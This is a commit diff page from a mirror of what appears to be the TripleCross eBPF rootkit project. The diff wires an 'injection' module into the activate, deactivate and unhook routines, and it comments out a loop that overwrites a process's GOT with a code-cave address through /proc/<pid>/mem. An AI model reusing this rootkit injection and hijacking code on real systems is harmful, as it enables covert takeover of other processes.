mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-30 05:03:08 +08:00
Updated some files for eveything to work now that it is all together. Execve hijacker and clients in particular
This commit is contained in:
@@ -110,6 +110,9 @@ int activate_all_modules_config(){
|
||||
//EXEC
|
||||
module_config.exec_module.all = ON;
|
||||
|
||||
//INJECTION
|
||||
module_config.injection_module.all = ON;
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
@@ -126,6 +129,9 @@ int deactivate_all_modules_config(){
|
||||
//EXEC
|
||||
module_config.exec_module.all = OFF;
|
||||
|
||||
//INJECTION
|
||||
module_config.injection_module.all = OFF;
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
@@ -147,7 +153,11 @@ int unhook_all_modules(){
|
||||
if(ret!=0) return -1;
|
||||
|
||||
//EXEC
|
||||
detach_exec_all(attr.skel);
|
||||
ret = detach_exec_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
|
||||
//INJECTION
|
||||
detach_injection_all(attr.skel);
|
||||
if(ret!=0) return -1;
|
||||
|
||||
return 0;
|
||||
|
||||
@@ -14,7 +14,6 @@
|
||||
|
||||
int manage_injection(const struct rb_event* event){
|
||||
char mem_file_name[100];
|
||||
__u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
|
||||
int mem_fd;
|
||||
|
||||
|
||||
@@ -26,7 +25,9 @@ int manage_injection(const struct rb_event* event){
|
||||
mem_fd = open(mem_file_name, O_RDWR);
|
||||
//lseek(mem_fd, event->got_address, SEEK_SET);
|
||||
|
||||
/*for(int ii=0; ii<sizeof(__u64); ii++){
|
||||
/*You can activate this to test overwritting GOT from eBPF
|
||||
__u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
|
||||
for(int ii=0; ii<sizeof(__u64); ii++){
|
||||
if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
|
||||
perror("Error while writing at GOT");
|
||||
return -1;
|
||||
|
||||
Reference in New Issue
Block a user